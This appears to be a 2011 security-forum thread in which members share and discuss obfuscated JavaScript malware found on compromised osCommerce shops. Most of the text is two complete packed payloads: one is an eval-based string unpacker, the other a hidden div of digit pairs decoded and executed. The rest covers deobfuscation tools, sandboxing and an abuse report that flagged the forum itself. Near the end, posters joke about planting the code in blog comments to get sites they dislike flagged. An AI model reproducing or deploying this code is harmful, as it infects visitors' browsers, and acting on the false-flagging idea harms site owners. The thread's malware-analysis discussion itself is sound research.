^a*7!2OyD3%7$4w$e*2*2$3$a&5R5NA-1*5`$e$dP&9/3Q`UJHH!0@&0<2$b*5>*c*3%2$b>YWc*0MN`%8#e-d$a&3W5>#9#6%aMKB1*3Y,ae-8*1F^-5*c*1E&4W3?A%6%b`A@#dy/9*9LA*eJG*2%a&6<aM!1%aT#e TT&1DcT@A-3ZQz|&9<c%1|#a%e%f%eT#b `2L#d-eF ^f#d_yRf>L-0P-9X>#fYDd ^9*4#f!2#aN*4yRb-6%3w-0%3%f%7?y/7%8T%1%4EA-bH&0<4-8*dE>N-eE*6 ja!3*f*9U#eV*5!3&3/dNHB4B4B4*2%1|&7Rc*1EXz#fEXz ee!fA$1$eT?~Z&6<5$4-5-4*3*0%6N%e&0<6MKQ$1@-4#e!3&3/d!3-6EUE-7L$3&0<dz*9zz$a$1%a$dYRcZH!f$b$a%b!f~Y<1EZ||N#f~~&5<9`$1#6z$f$1zzY<b`~wN$3^#7^&6R5 fHT%2&1<c%fzPZXQ$1*2&3,aeA$0%1GA%0V*a&6D8G%aL-7|`$eQI/fHJ#8B5*b%8$bK&7/f%3%3LH*5~#8E&7DfF*8A^?!1H!1&1/7*4NK$eE*8|| j4z@!3F*0-0%4M&3R0#6$awXKMNHY/cPMQ-6MNK$1&3<9?@#d_!2V@$dyR7%a|$aM$3_?G&5/f!f-f%eL%4G#7$f&7/5@O%6NN%a$3w&5Wb$0$1$4KH@>HY/8*cG#9L_#f*0%7&5R6wT%fB1FLF*7&4<b%0V%1F!fGB1w&4<c$3T$b!0UXw$3&0<9%2wKw$4|#a%8&0R1KKZX>^$ewYR6FFJEK-fZ%1&4<5*0%7#8$b$f%fzB3ID3_~O%8Z%6M*8&5R8Z%e*a$dP#aA*b&9/9$b!f@V#aUU%f&6D2ZQ%8wz-3%aU edVV#6AN%1LL&6<1A#aZ`K$eX%e&9R0X!2#7%b%8$4%3%fy<bV#c%a~|%b$a-b&6,a5*4$fT_$f?L!1&1De*4?*8!fL$a%a| jd$4`@GF#cE-8&4D3K%a|*a$1%aQ%a&5R6z>*1@M%3H>Y/e#c#c#a#aJ*7*7A&9DeJ$0wQ%b`KF&4W5L-0$fXX%3%f%bIR4?@#d!2#eN%7Xy,aa%f$3%bV*4!fB1A&6<3#f ^1T%3%e%e%4y<aK$4*6%3$bA*bJ&9D1V#8V*9A-1%1%2&6/9?E*b$e$0N%bX&7R7!0*5w%6>!0*6#d `6XPQwwX%8M&3/8*f@$b#6@>-0PY,d2EE-0^E#c-3X j9KZK>-2>$bzY,d1$4Z*5%4?>-3@Y<2#d!0HXE-d?!0&0WdE$3%fT#e TU&1/6!3-0*1#fJ%7K|&3W4G!f>*1KN`L&6<5#f#a#9#dT#d%6#fy/8$4#d%4L$3$0Kw&0R6?A_V*2-3-8-9y<2%4%aB8%6%6???I/5F>FAF?FU ea~?^?#6?#7?ID7A#8A#bA#dA#9&9/5#6_#a_#b_#c_&5W0>*1>*2>*3>*4Y/4*2F*3F*6F*7F&4W8F*9F*aF*bF*c e1*a!1*b!1*c!1*d!1&1,a7P#8$d$fK$d$ezI/9%4L#eA|#e%4#d&1D9#b*7#9*2#aP~B0YD2JJ#7$3`QMP&9Re#8$a|$aJOOOIDc%6M%2ZAT?&1\\\\E:"32);ev",*``ZXK*b$0$1:"al(l)\\\'",EE!0*9Q>!0#8*2:");"};dk=[] I-r x in v){dk.push(trim(x,v))};e-l(dk 8\\\'\\\'))!v7#v8$vc%vb&:8*v9+,q-va/+7<,b>!8?!a@!bA!9BvdD+8E!7F!4G!dH#0I:90J#2K%cL!eM$7N$5O#3P#1Q$2R,cT%5U!cV!6W+9X$6Y&8Z%d^#5_!5`$8w%9y&2z$c|$9~#4\\\\,#6^L%2*0>$f*2\' Ic=46;c--;d=(t=d 6\'!#$%&*+-/<>?@ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\\\\'[c])) 8t.pop())); 9 (=d K &}; 9unAJAX L dE -q ]+ rN( $R); 3 rr -A 2 Yr)} 3 z){ Hself=this; 3 B=="GET" A$K= F+ i+ Yt , R$K W + R F W;try{ z.setRequestHeader("Content-Type","application/x-www-form-urlencoded" 5){}} z.onreadystatechange !){switch( #z.readyState){case 1: #L 02: #u 03: #y 04: ;= #z.r (Text; ;XML= #z.r (XML; #C[0 Q; #C[1 QText; 3#w){self.r N 3#A A)= #A.nodeName; ).toLowerCase(); 3)=="input Jselect Joption Jtextarea" A#A. >= ; +#A.innerHTML= ;}} 3#C[0]=="200" A#J ]+#e()} #rt="";break} Uz.send( Yt)}} Um ],rg()} a.ajax : $M();try{ H $G 2\' $D\') *c("query", $G gd gf) *F="query.php" *B SG gB gf *rr=\' $rz\' *L SN *u Sg *y Ss *J Sx; P 5){ P)} this g !=function( #self g $kx_ %encodeURIComponent( &e ,rr ?A ?F=file ,t :Object ],C : /(2) (esponse )elemNodeName *;ajax g +}else{ ,; - A .try{ z :ActiveXObject("M /Array 0();break;case 2=document.getElementById( 3if( 4true 5)}catch(e 6.split( 7.length 8.join( 9this.r :=new ;self.r ( <T" ,i="?" ,rx="&" ,r =return >value ?=null , @ !){ U A){ C t[key][ G( $j[0], $j[1]) Hvar I;for( J"|| )==" K ,b= 4 ,w=fals L ! MXMLHttpRequest NunR (()} O -rt+= Yx+ $ Pajax.runAJAX( Q]= #z.status Rz.open( B, S= $ T-d!3 U} , V%b%a#6Q W, 4) X.XMLHTTP" 5 Y r Z){if( []= /( ]() ^!2* _ L$o, `&0/ awindow d$R A3 e&4/ f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split(' ! # $ % & ( ) * + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A C G H I J K L M N O P Q R S T U V W X Y Z [ ] ^ _ ` a d e f g h j k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)</script>

Quote

<html><body><span></span><div style="visibility:hidden"><div>35601666693316601122674717693316601122665816316718043154391414582216
3569312258145822601631041915762216446760754477046975373077345469316704315
4391414584458772211145844586975333414584458697533341160697551047711727172
7271727271727271727271727271727271727271727271727271727271727271727271727
2717272717272717272717272717272717272717272717272717272717272717272717272
7172727172727172727172727172727172727172727172727172727172727172727172727
1727271727271727271727271727271727271727271727271727271727271727271727271
7272717272717272717272717272717272717272717272717272717272717272717272717
2727172727172727172727172727172727172727172727172727172727172727172727172
7271727271727271727271727271727271727271727271727271727271727271727271727
2717272717272717272717272717272717272717272717272715151722632515172263258
4458697533341160697551047711727674745533583516671758311669547766202233221
6422176755362473111206614316622310434664069642270601122662766103005124568
7425482901243005124568742541336964225122732210424230051245687425482901243
0051245687425413734513724582323223104346676166427100477775439141460576904
6054316033205851313411142051540454363327065230222768106642423005124568742
5482901243005124568742541373451372458232322310434660222776634635708484824
6627663216226077224963572231775310010261012806516101280848482410094242300
5124568742548290124300512456874254137345137245823232231043466326064646634
6357084848245149542275531065294810076676166407664060645822094242300512456
8742548290124300512456874254137345137245823232231043466346357464924714242
3005124568742548290124300512456874254137345137245823232231043466582277663
4027716226011662766311622607722346357223177531071203420635102771622601110
0942423005124568742548290124300512456874254137345137245823232231043466323
4755877666020484454223869756016446627665066424230051245687425482901243005
1245687425413734513724582323223104346632347558776660200260352232162260772
2493522161316697722662766066642423005124568742548290124300512456874254137
3451372458232322310434663234755877666020026035223216226077227034772973695
8776627665066664242300512456874254829012430051245687425413734513724582323
2231043466340277162260115177445422662766602048445422386975601644664242300
5124568742548290124300512456874254137345137245823232231043466340277162260
1151345422756642423005124568742548290124300512456874254137345137245823232
2310434663402771622601151591669772266346357084848245116225854347558223834
2044424230051245687425482901243005124568742541373451372458232322310434663
4027716226011515860352277343369642266406964227060112207666020026035223216
2260772270347729736958776642423005124568742548290124300512456874254137345
1372458232322310434663402771622601151316434582242423005124568742548290124
3005124568742541373451372458232322310434665822776634027716226011662766753
4770469753766424230051245687425482901243005124568742541373451372458232322
3104346602227766731164662766703477046975376642423005124568742548290124300
5124568742541373451372458232322310434660222776613580402042264646627663216
2260772249635722317753101302311669547751020422646410096642423005124568742
5482901243005124568742541373451372458232322310434661358040204226464512176
7566406964227060112207667407664816762266424230051245687425482901243005124
5687425413734513724582323223104346602227766400249662766321622607722496357
2231775310023116695477697537514069642202445877221149635722317710096642423
0051245687425482901243005124568742541373451372458232322310434664002495103
2264227722406964226610300512456874254829012430051245687425413734513563581
0664242300512456874254829012430051245687425413734513724580031583116695477
6630051245687425482901243005124568742541373451372458427576646247511622546
4603122531427143707660277166975375133163411320460163234202253525009095116
2254646031225314101437076602771669753751331634113204601632342022535545090
9511622546460312253142314370766027716697537513316341132046016323420225355
1209095116225464603122531436143707660277166975375133163411320460163234202
2535255090951162254646031225314464924711437076602771669753751331634113204
6016323420225368060712450712450712740745520712550750745007505074075074740
9095116225464603122531437245814370766027716697537513316341132046016323420
2253505012075612075050260909511622546460312253144114370766027716697537513
3163411320460163234202253560609095116225464603122531430051245687425143707
6602771669753751331634113204601632342022535568090909251714583116695477421
8424725203431761122757751372277296422112275775838444860377060112253185854
60751809437423516975752216084801286769331660112225</div></div><script>
q="v";

el=document.getElementsByTagName("di"+q)[0];

try{


if (Math.exp(1)===Math.E) throw 'xtNode';


}catch(qq){

with({a:'createTe'}){

k=document[a+qq]("eval");

}

}

q="extNode";

try{

if (Math.exp(1)===Math.E) throw 1;

}catch(qq){

el2=document["createT"+q]("ReferenceError");

w="deVa";

}

e = eval(k.nodeValue);

e("k=el2.no"+w+"lue");

z="|MSDh#2,H)@m8W/qr<\"?dRe]P;5!LE&cCfov{gB:F}>[y4J'TO1.6(p39jswaX\\blG =7iNA%x0nut";

with(document){

qwe=getElementsByTagName("div")[parseInt(Math.SQRT2*Math.SQRT2/2)]['innerHT'+'ML'];

}

s="";

aaa=qwe["len"+"gth"];

w="1";

for (i=0;i!==aaa;i+=2){

q=qwe.substr(i,1)*10+qwe.substr(i+ +w,1)*1;

with({a:s}){

s=a.concat(z["su"+"bstr"](q,1));

}

}

e(s);
</script></body></html>

Options: ReplyQuote
Re: Interesting JS malware
Posted by: pgl
Date: July 11, 2011 09:36AM

Where did you come across this?

Options: ReplyQuote
Re: Interesting JS malware
Posted by: Skyphire
Date: July 11, 2011 02:58PM

Check: http://www.buenosairesturismo.com.ar/rivadaviabuenosaires/

Looks like a HCP zeroday exploit to me. Didn't have the time to deobfuscate it yet, but while running in a sandbox it tried to launch the HCP protocol of some sort.

Some 8+ results, it seems fairly new.

http://www.google.com/search?q=%3A"ing.fr"%2CJG*2%25a%25fzV*aV%3A"omCha"%2C>%258%258*2*5LB0_*4%3A"rCode("<6%23fF%253%23f%237%23d_%244y<d*3*6%24eV*e*d%24a*3%266R8%23b!0G%254%23d%25eTM+`8B6P*3K%236>*4HY%2Fc*dPB1JJ-&ie=utf-8

Options: ReplyQuote
Re: Interesting JS malware
Posted by: Skyphire
Date: July 11, 2011 03:11PM

Oh wait, way more...

http://www.google.com/search?q=a+d+e+f+g+h+j+k'.substr(c-%3D(x%3Dc<2%3F1%3A2)%2Cx))).join(t.pop()))%3Beval(d)&ie=utf-8&oe=utf-8

Now Hackvertor guys, can we crack it or not! ;-)

Options: ReplyQuote
Re: Interesting JS malware
Posted by: Skyphire
Date: July 11, 2011 03:14PM

It seems due to a OScommerce (webshop) script, they all seem to run it so far.

Options: ReplyQuote
Re: Interesting JS malware
Posted by: Skyphire
Date: July 12, 2011 04:28AM

It's rhetorical of course, since I know how to do it. But let's assume a company got hacked and you are in charge to deobfuscate it. What would you do and what will you use? let's say you got 30 minutes to figure out the threath. Some would use Rhino, but then you need to build FireFox with Rhino and you need the source right now.

One way of doing it quickly is using this plugin:

https://addons.mozilla.org/en-us/firefox/addon/javascript-deobfuscator/

It deobfuscated it on the fly:

http://pastebin.com/rYUfwFBx



Edited 2 time(s). Last edit at 07/12/2011 04:31AM by Skyphire.

Options: ReplyQuote
Re: Interesting JS malware
Posted by: Gareth Heyes
Date: July 12, 2011 08:24AM

@Skyphire

I would use Hackvertor but since the sandbox is in a state of pwnage at the minute it wouldn't be very wise to run untrusted js inside it :D When I know it's securish =) I'd probably use FF proxies to create a fake environment to run the untrusted code in

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Interesting JS malware
Posted by: rsnake
Date: July 29, 2011 08:14PM

FYI - you trouble makers you with all your being security experts and talking about your fancy security stuff. Stop taunting the Germans with false positives - they get cranky:


> From: <abuse@clean-mx.de>
> To: <support@onr.com>
> Cc: <soc@us-cert.gov>
> Subject: [clean-mx-viruses-931602](207.200.14.141)-->(support@onr.com)
> viruses sites (1 so far) within your network, please close them! status: As
> of 2011-07-29 11:43:00 CEST
> Date: 2011-07-29 05:20:30
>
> > Dear abuse team,
> >
> > please help to close these offending viruses sites(1) so far.
> >
> > status: As of 2011-07-29 11:43:00 CEST
> > http://support.clean-mx.de/clean-mx/viruses.php?email=support@onr.com&response=alive
> >
> > (for full uri, please scroll to the right end ...
> >
> >
> > We detected many active cases dated back to 2007, so please look at the date
> > column below.
> > You may also subscribe to our MalwareWatch list
> > http://lists.clean-mx.com/cgi-bin/mailman/listinfo/viruswatch
> >
> > This information has been generated out of our comprehensive real time
> > database, tracking worldwide viruses URI's
> >
> > most likely also affected pages for these ip may be found via passive dns
> > please have a look on these other domains correlated to these ip
> > example: see http://www.bfk.de/bfk_dnslogger.html?query=207.200.14.141
> >
> > If your review this list of offending site, please do this carefully, pay
> > attention for redirects also!
> > Also, please consider this particular machines may have a root kit installed !
> > So simply deleting some files or dirs or disabling cgi may not really solve
> > the issue !
> >
> > Advice: The appearance of a Virus Site on a server means that
> > someone intruded into the system. The server's owner should
> > disconnect and not return the system into service until an
> > audit is performed to ensure no data was lost, that all OS and
> > internet software is up to date with the latest security fixes,
> > and that any backdoors and other exploits left by the intruders
> > are closed. Logs should be preserved and analyzed and, perhaps,
> > the appropriate law enforcement agencies notified.
> >
> > DO NOT JUST DELETE THE FILES. IF YOU DO NOT FIX THE SECURITY
> > PROBLEM, THEY WILL BE BACK!
> >
> > You may forward my information to law enforcement, CERTs,
> > other responsible admins, or similar agencies.
> >
> > +-----------------------------------------------------------------------------------------------
> >
> > |date |id |virusname |ip |domain |Url|
> > +-----------------------------------------------------------------------------------------------
> > |2011-07-29 10:30:02 CEST |931602 |JS/Kryptik.BN |207.200.14.141 |ckers.org
> > |http://sla.ckers.org/forum/read.php?24,36702
> > +-----------------------------------------------------------------------------------------------
> >
> >
> > Your email address has been pulled out of whois concerning this offending
> > network block(s).
> > If you are not concerned with anti-fraud measurements, please forward this
> > mail to the next responsible desk available...
> >
> >
> > If you just close(d) these incident(s) please give us a feedback, our
> > automatic walker process may not detect a closed case
> >
> > explanation of virusnames:
> > ==========================
> > unknown_html_RFI_php not yet detected by scanners as RFI, but pure php code
> > for injection
> > unknown_html_RFI_perl not yet detected by scanners as RFI, but pure perl code
> > for injection
> > unknown_html_RFI_eval not yet detected by scanners as RFI, but suspect
> > javascript obfuscationg evals
> > unknown_html_RFI not yet detected by scanners as RFI, but trapped by our
> > honeypots as remote-code-injection
> > unknown_html not yet detected by scanners as RFI, but suspious, may be in rare
> > case false positive
> > unknown_exe not yet detected by scanners as malware, but high risk!
> > all other names malwarename detected by scanners
> > ==========================
> >
> >
> > yours
> >
> > Gerhard W. Recher
> > (Geschäftsführer)
> >
> > NETpilot GmbH
> >
> > Wilhelm-Riehl-Str. 13
> > D-80687 München
> >
> > GSM: ++49 171 4802507
> >
> > Handelsregister München: HRB 124497
> >
> > w3: http://www.clean-mx.de
> > e-Mail: mailto:abuse@clean-mx.de
> > PGP-KEY: Fingerprint: A4E317B6DC6494DCC9616366A75AB34CDD0CE552 id:
> > 0xDD0CE552
> > Location: http://www.clean-mx.de/downloads/abuse-at-clean-mx.de.pub.asc

Options: ReplyQuote
Re: Interesting JS malware
Posted by: Skyphire
Date: August 11, 2011 03:33PM

Interesting Rsnake... So if we post the code as a comment on some blogs we dislike, the site will be flagged. Black ops! ;-)

Options: ReplyQuote
Re: Interesting JS malware
Posted by: Gareth Heyes
Date: August 12, 2011 05:07PM

Pretty dumb if the scanner can't recogise script from text but yeah pretty fun posting this stuff in comments etc :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote


Sorry, only registered users may post in this forum.